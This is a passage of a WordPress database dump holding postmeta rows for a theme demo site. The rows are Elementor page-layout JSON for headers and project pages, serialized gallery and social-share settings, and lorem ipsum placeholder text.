ize\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":false},{\"id\":\"beab91f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\",\"align_mobile\":\"center\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[{\"id\":\"b558664\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Send email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"e4b6ad8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":28,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f47693c\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[{\"id\":\"a76c6cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":50,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":30},\"elements\":[{\"id\":\"5fbe4bf\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"f98c238\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/ovathemes\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"93318f1\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ovatheme.envato\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-pinterest-p\",\"library\":\"fa-brands\"},\"_id\":\"f301bd3\",\"link\":{\"url\":\"https:\\/\\/ovatheme.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#02010100\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_secondary_color\":\"#E3B25A\",\"ova_social_icons_display\":\"inline-flex\",\"_element_width\":\"auto\",\"icon_secondary_color\":\"#808080\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":false},{\"id\":\"0cbe6bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.332,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":5},\"elements\":[{\"id\":\"02a8f8b\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#808080\",\"link_color_hover\":\"#FFFFFF\",\"link_color_active\":\"#FFFFFF\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"20\",\"bottom\":\"5\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":false},{\"id\":\"64a01ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":45,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":65},\"elements\":[{\"id\":\"331f18a\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"size_icon\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"2a1ae6f\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":false}],\"isInner\":false}]'),(1935,4635,'_elementor_page_assets','a:0:{}'),(1936,4635,'_wxr_import_has_attachment_refs','1'),(1937,4636,'_wp_page_template','default'),(1938,4636,'hf_options','header'),(1939,4636,'_elementor_edit_mode','builder'),(1940,4636,'_elementor_template_type','wp-post'),(1941,4636,'_elementor_version','3.6.6'),(1942,4636,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1943,4636,'_elementor_page_assets','a:0:{}'),(1944,4636,'_wxr_import_has_attachment_refs','1'),(1945,4637,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(1946,4637,'ova_project_service','Interior design'),(1947,4637,'ova_project_architect','Mike hardson'),(1948,4637,'ova_project_duration','4.5 Months'),(1949,4637,'ova_project_location','Broklyn, New York'),(1950,4637,'_elementor_edit_mode','builder'),(1951,4637,'_elementor_template_type','wp-post'),(1952,4637,'_elementor_version','3.6.6'),(1953,4637,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:85:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/modern-villa/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:92:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/modern-villa/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:100:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/modern-villa/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:86:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/modern-villa/\";}}'),(1954,4637,'_wp_page_template','default'),(1955,4637,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Modern villa\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(1956,4637,'_elementor_page_assets','a:0:{}'),(1957,4637,'_thumbnail_id','1153'),(1958,4637,'_wxr_import_has_attachment_refs','1'),(1959,4638,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(1960,4638,'ova_project_service','Interior design'),(1961,4638,'ova_project_architect','Mike hardson'),(1962,4638,'ova_project_duration','4.5 Months'),(1963,4638,'ova_project_location','Broklyn, New York'),(1964,4638,'_elementor_edit_mode','builder'),(1965,4638,'_elementor_template_type','wp-post'),(1966,4638,'_elementor_version','3.6.6'),(1967,4638,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:87:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/vintage-design/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:94:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/vintage-design/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:102:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/vintage-design/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab 